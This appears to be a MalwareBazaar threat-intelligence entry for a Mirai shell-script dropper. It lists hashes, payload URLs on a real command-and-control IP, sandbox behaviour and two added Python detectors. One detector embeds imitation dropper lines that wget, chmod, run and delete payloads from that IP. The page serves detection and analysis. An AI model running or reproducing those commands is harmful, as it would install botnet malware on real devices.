MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 d513e92a5b874779ffa41df508f054038b520cf05d179427d2fd84bda5d695d5. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



Mirai


Vendor detections: 9



SHA256 hash: d513e92a5b874779ffa41df508f054038b520cf05d179427d2fd84bda5d695d5
SHA3-384 hash: 72ce881f6bc6f8db1b149a9b80501db2cf3a83177dc251c4485fa1dad85ea1cf25c561f0e6ed36d616eb7827c3483cca
SHA1 hash: 47e57ed0dd82319a364e81aa447f6e4e39600b2a
MD5 hash: 6450aa02ff0d90d41d589bb5ed8f0e41
humanhash: uniform-burger-tennis-charlie
File name: 1.sh
Download: download sample
Signature: Mirai
File size: 2'179 bytes
First seen: 2025-10-03 04:11:58 UTC
Last seen: Never
File type: sh
MIME type: text/x-shellscript
ssdeep: 48:141LvR2M5pIiKMCmCQ3gSH4JU/fSWO6NX3Fe+:pRQ3gSwa
TLSH: T1D341E5F6A38BCA03D27D87CA3EA50006B010C36BB49F8735DCE9FAC90494E9C7255A85
Magika: shell
Reporter: abuse_ch
Tags: mirai sh
IOCs (URLs referenced by the script and the samples they delivered)

URL                                       Malware sample (SHA256 hash)                                      Signature  Tags
http://157.20.32.209/bins/morte.arc       4704e07f48738bd7b4cd44cec97a7c5526a4419fa665fd425ba217425916024a  Mirai      mirai opendir
http://157.20.32.209/bins/morte.arm       f6d0afe358d658d05afad447734fee5a590e953c6c0f98cbd217a867521f8754  Mirai      mirai opendir
http://157.20.32.209/bins/morte.arm5      17bb63761f5c8c1601c331cf193c55c09d4619053f9572b3648ef69e49fd1a89  Mirai      mirai opendir
http://157.20.32.209/bins/morte.arm6      b3cd17f0afa885b377f8b04679e75f7f0827189f0b3f025a3814d156b4db1c38  Mirai      mirai opendir
http://157.20.32.209/bins/morte.arm7      09d4f358af13014b924279b5b4318a7da185db5a95b1175fac33a87e93f00b35  Mirai      mirai opendir
http://157.20.32.209/bins/morte.i686      a1617a2f4c04b81e7d8fa32fd63a09ed977cd7607b24b76055b36fdea3112c89  Mirai      mirai opendir
http://157.20.32.209/bins/morte.m68k      cdab74aed8c37c66f1370e839cd48ae264c4bda7f1aae193b516e1c9a52a93ea  Mirai      mirai opendir
http://157.20.32.209/bins/morte.mips      1cb41b9c1a9e8123336054934a6ade938b976b5dbb87e852c742ef3f1fa9cdbb  Mirai      mirai opendir
http://157.20.32.209/bins/morte.mpsl      9f142d179fbde485e13d3364d65180ee6d62449aff02e35d87447ca0f9417210  Mirai      mirai opendir
http://157.20.32.209/bins/morte.ppc       1dc7e464cdaabeaa49a759a198d6a69d7cfc69014337f7fe1881dc9f3efdb8dd  Mirai      mirai opendir
http://157.20.32.209/bins/morte.sh4       bb8425e14a2cc5ce0d44da49e2b28d19e081b6352f48c376c7b0f9b0c92e3054  Mirai      mirai opendir
http://157.20.32.209/bins/morte.spc       e43b10988feae69a629b29ad0826d88d485372dabbed9421f2e1094147da7c01  Mirai      mirai opendir
http://157.20.32.209/bins/morte.x86       20eec1f49d7ab9223b5d47b6f464aed12e418942570966eae401968088463f1a  Mirai      mirai opendir
http://157.20.32.209/bins/morte.x86_64    16ba16bf6f0d4de4341bf38820777755012f008554f5e482b88cd4a85e97eb8b  Mirai      mirai opendir

Intelligence


File Origin
# of uploads: 1
# of downloads: 22
Origin country: DE
Vendor Threat Intelligence
Verdict: Malicious
Threat level: 10/10
Confidence: 100%
Tags: busybox

Verdict: Malicious
File Type: unix shell
First seen: 2025-10-03T01:22:00Z UTC
Last seen: 2025-10-04T13:52:00Z UTC
Hits: ~10
Status: terminated
Behavior Graph (summarised from the rendered process graph):
/usr/bin/sudo (pid 2791) executes the sample as /tmp/sample.bin (pid 2793). The script runs /usr/bin/cp once and then repeats one loop per architecture: /usr/bin/wget and /usr/bin/curl (net, send-data, write-file) fetch the payload from 157.20.32.209:80 (each wget request sends 142-145 bytes, each curl request 91-94 bytes), /usr/bin/chmod marks it executable, a /usr/bin/bash child is cloned to run it, and /usr/bin/rm deletes the file.
Three payloads appear as executed processes, consistent with an x86-64 sandbox: /tmp/morte.i686 (pid 3878), /tmp/morte.x86 (pid 5301) and /tmp/morte.x86_64 (pid 5311, mprotect-exec). Each forks twice (the grandchild is flagged write-config and zombie), spawns /usr/bin/dash which runs /usr/bin/cp, and forks a further child that performs DNS and network activity: connections to 8.8.8.8:53 (775 bytes sent per payload; a later morte.i686 child, pid 5325, sends 2325 bytes) and to 65.222.202.53:80 (pid 5325 sends 2 bytes).
Threat name: Linux.Trojan.Vigorf
Status: Malicious
First seen: 2025-10-03 04:15:55 UTC
File Type: Text (Shell)
AV detection: 12 of 36 (33.33%)
Threat level: 5/5

Result
Malware family: (not set)
Score: 10/10
Tags: family:mirai antivm botnet credential_access defense_evasion discovery execution linux persistence
Behaviour
Command and Scripting Interpreter: Unix Shell
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
Changes its process name
Checks CPU configuration
Reads system network configuration
Reads process memory
Enumerates active TCP sockets
Enumerates running processes
Modifies init.d
Modifies rc script
File and Directory Permissions Modification
Executes dropped EXE
Mirai
Mirai family
Malware Config
C2 Extraction:
157.20.32.209
Please note that we are no longer able to provide a coverage score for Virus Total.
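The sandbox graph above shows the pattern that makes this kind of script easy to catch in process telemetry: one parent shell that fetches several files from a bare-IP URL, chmods them under /tmp, executes whichever one matches the host CPU and deletes the rest. The script below is an added example, not code from MalwareBazaar or from the sample. EVENTS is a constructed log that mirrors that graph (it is not a real export), and the "<pid> <ppid> <exe> <argv...>" line format, the FETCHERS list and the TMP_DIRS list are assumptions rather than any EDR's schema.

```python
"""Detect the fetch -> chmod -> execute-from-tmp -> delete loop of a
multi-architecture shell-script dropper in process-execution telemetry.

Added example, not code from the MalwareBazaar page. EVENTS is a constructed
log that mirrors the sandbox behaviour graph for this sample (one parent shell
spawning wget/curl, chmod, the dropped binary and rm for each architecture);
the "<pid> <ppid> <exe> <argv...>" line format is an assumption.
"""
import re
from collections import defaultdict
from dataclasses import dataclass, field

IP_URL = re.compile(r"^https?://(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?/(\S+)$")
FETCHERS = {"wget", "curl", "tftp", "ftpget"}          # assumed tool list
TMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")         # assumed staging dirs

# Constructed events (pids borrowed from the graph, argv invented for illustration).
EVENTS = [
    "2793 2791 /tmp/sample.bin /tmp/sample.bin",
    "2800 2793 /usr/bin/wget http://157.20.32.209/bins/morte.x86 -O /tmp/morte.x86",
    "2930 2793 /usr/bin/curl -o /tmp/morte.x86 http://157.20.32.209/bins/morte.x86",
    "3018 2793 /usr/bin/chmod +x /tmp/morte.x86",
    "3020 2793 /tmp/morte.x86",
    "3024 2793 /usr/bin/rm -rf /tmp/morte.x86",
    "3026 2793 /usr/bin/wget http://157.20.32.209/bins/morte.x86_64 -O /tmp/morte.x86_64",
    "3078 2793 /usr/bin/curl -o /tmp/morte.x86_64 http://157.20.32.209/bins/morte.x86_64",
    "3168 2793 /usr/bin/chmod +x /tmp/morte.x86_64",
    "3169 2793 /tmp/morte.x86_64",
    "3171 2793 /usr/bin/rm -rf /tmp/morte.x86_64",
    "3172 2793 /usr/bin/wget http://157.20.32.209/bins/morte.mips -O /tmp/morte.mips",
    "3245 2793 /usr/bin/chmod +x /tmp/morte.mips",
    "3248 2793 /usr/bin/rm -rf /tmp/morte.mips",
    # Benign contrast: a single download that is unpacked but never chmod'ed or run.
    "4100 4000 /usr/bin/wget https://203.0.113.10/pkg.tar -O /tmp/pkg.tar",
    "4101 4000 /usr/bin/tar xf /tmp/pkg.tar",
]


@dataclass
class Event:
    seq: int
    pid: int
    ppid: int
    exe: str
    argv: list


@dataclass
class ParentState:
    hosts: set = field(default_factory=set)
    fetched: list = field(default_factory=list)   # (seq, URL path)
    chmod: list = field(default_factory=list)     # (seq, tmp path)
    execd: list = field(default_factory=list)     # (seq, exe under a tmp dir)
    removed: list = field(default_factory=list)   # (seq, tmp path)


def parse_event(seq, line):
    pid, ppid, exe, *argv = line.split()
    return Event(seq, int(pid), int(ppid), exe, argv)


def _tmp_args(argv):
    return [a for a in argv if a.startswith(TMP_DIRS)]


def detect_dropper_chains(lines, min_fetches=3):
    """One finding per parent process that fetched >= min_fetches distinct files
    from bare-IP URLs and afterwards chmod'ed files under a tmp directory.
    Severity is 'high' when a fetched file was also executed, else 'medium'."""
    states = defaultdict(ParentState)
    for seq, line in enumerate(lines):
        ev = parse_event(seq, line)
        st = states[ev.ppid]
        base = ev.exe.rsplit("/", 1)[-1]
        if base in FETCHERS:
            for m in filter(None, map(IP_URL.match, ev.argv)):
                st.hosts.add(m.group(1))
                st.fetched.append((seq, m.group(2)))
        elif base == "chmod":
            st.chmod.extend((seq, p) for p in _tmp_args(ev.argv))
        elif base == "rm":
            st.removed.extend((seq, p) for p in _tmp_args(ev.argv))
        elif ev.exe.startswith(TMP_DIRS):
            st.execd.append((seq, ev.exe))

    findings = []
    for ppid, st in states.items():
        paths = sorted({p for _, p in st.fetched})
        if len(paths) < min_fetches or not st.chmod:
            continue
        first_fetch = min(s for s, _ in st.fetched)
        if min(s for s, _ in st.chmod) < first_fetch:
            continue  # chmod before any download is not the dropper loop
        executed = sorted({p for s, p in st.execd if s > first_fetch})
        cleaned = any(s > first_fetch for s, _ in st.removed)
        findings.append({
            "parent_pid": ppid,
            "hosts": sorted(st.hosts),
            "fetched": paths,
            "executed": executed,
            "cleanup": cleaned,
            "severity": "high" if executed else "medium",
        })
    return findings


if __name__ == "__main__":
    for finding in detect_dropper_chains(EVENTS):
        print(finding)
```

The ordering check (first chmod after first download, execution and rm after that) is what keeps ordinary package installs out of the result; the benign parent in EVENTS is skipped because it fetched a single file and never changed permissions.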

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. These are matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are displayed.

Rule name:Linux_Shellscript_Downloader
Author:albertzsigovits
Description:Generic Approach to Shellscript downloaders
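The rule above is described as a generic approach to shell-script downloaders. The script below is an added example of the same idea in Python, written here for illustration; it is not the YARA rule, not MalwareBazaar code, and not the contents of 1.sh. It scores the generic fetch / chmod / execute / delete pattern, counts how many architecture-specific payload names one script pulls from the same host, and extracts the URLs and hosts as IOCs. DROPPER and INSTALLER are constructed inputs: DROPPER imitates the multi-architecture loop the sandbox graph shows for this sample (only the host and payload names come from the page), INSTALLER is a benign-looking script for contrast, and the indicator weights and verdict thresholds are assumptions.

```python
"""Static triage of a shell-script dropper: score the generic
fetch / chmod / execute / delete pattern and extract its IOCs.

Added example, not the YARA rule named on the page and not MalwareBazaar code.
DROPPER and INSTALLER are constructed inputs; DROPPER is not the real 1.sh.
Weights and thresholds are assumptions chosen for illustration.
"""
import re

URL_RE = re.compile(r"(?:https?|tftp|ftp)://[^\s'\"<>;|&]+")
IPV4_HOST = re.compile(r"^(?:https?|tftp|ftp)://(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?/")
# Architecture suffixes seen in the IOC table for this sample.
ARCHES = {"arc", "arm", "arm5", "arm6", "arm7", "i686", "m68k", "mips",
          "mpsl", "ppc", "sh4", "spc", "x86", "x86_64"}

PATTERNS = {
    "fetch_tool":    re.compile(r"\b(?:wget|curl|tftp|ftpget)\b"),
    "raw_ip_url":    re.compile(r"(?:https?|tftp|ftp)://\d{1,3}(?:\.\d{1,3}){3}[/:]"),
    "chmod_exec":    re.compile(r"\bchmod\s+(?:\+x|[0-7]*7[0-7]*)\b"),
    "exec_relative": re.compile(r"(?:^|[;&|\s])\./[\w.\-]+", re.M),
    "self_delete":   re.compile(r"\brm\s+-\w*f"),
    "cd_tmp":        re.compile(r"\bcd\s+/(?:tmp|var/tmp|dev/shm)\b"),
    "busybox":       re.compile(r"\bbusybox\b"),
}
WEIGHTS = {"fetch_tool": 1, "raw_ip_url": 2, "chmod_exec": 2, "exec_relative": 1,
           "self_delete": 1, "cd_tmp": 1, "busybox": 1, "multi_arch": 3}

# Constructed: imitates the per-architecture loop shown in the behaviour graph.
DROPPER = """\
cd /tmp || cd /var/run || cd /dev/shm
wget http://157.20.32.209/bins/morte.x86 -O morte.x86; chmod +x morte.x86; ./morte.x86; rm -rf morte.x86
wget http://157.20.32.209/bins/morte.x86_64 -O morte.x86_64; chmod +x morte.x86_64; ./morte.x86_64; rm -rf morte.x86_64
curl -O http://157.20.32.209/bins/morte.mips; chmod 777 morte.mips; ./morte.mips; rm -rf morte.mips
wget http://157.20.32.209/bins/morte.arm7 -O morte.arm7; chmod +x morte.arm7; ./morte.arm7; rm -rf morte.arm7
"""

# Constructed: a benign installer that also downloads and deletes, for contrast.
INSTALLER = """\
set -eu
tmp=$(mktemp -d)
curl -fsSL https://dl.example.org/tool-1.2.tar.gz -o "$tmp/tool.tar.gz"
echo "<expected-sha256>  $tmp/tool.tar.gz" | sha256sum -c -
tar -C "$tmp" -xzf "$tmp/tool.tar.gz"
sudo install -m 0755 "$tmp/tool" /usr/local/bin/tool
rm -rf "$tmp"
"""


def triage_script(text):
    """Return indicators, score, verdict and extracted IOCs for one script."""
    hits = {name for name, rx in PATTERNS.items() if rx.search(text)}
    urls = sorted(set(URL_RE.findall(text)))
    # A payload name ending in a known arch suffix marks a multi-arch dropper.
    arches = sorted({u.rsplit(".", 1)[-1] for u in urls if u.rsplit(".", 1)[-1] in ARCHES})
    if len(arches) >= 3:
        hits.add("multi_arch")
    hosts = sorted({m.group(1) for m in map(IPV4_HOST.match, urls) if m})
    score = sum(WEIGHTS[name] for name in hits)
    verdict = "dropper" if score >= 6 else "suspicious" if score >= 3 else "benign"
    return {"score": score, "verdict": verdict, "indicators": sorted(hits),
            "urls": urls, "hosts": hosts, "arches": arches}


if __name__ == "__main__":
    for label, text in (("DROPPER", DROPPER), ("INSTALLER", INSTALLER)):
        print(label, triage_script(text))
```

Downloading and deleting on their own score low (the installer does both); the weight sits on bare-IP URLs, making a fresh download executable, and pulling the same payload name for several CPU architectures, which is what distinguishes an IoT dropper from an install script.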

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Web download
  Mirai
    sh d513e92a5b874779ffa41df508f054038b520cf05d179427d2fd84bda5d695d5 (this sample)

Delivery method: Distributed via web download

Comments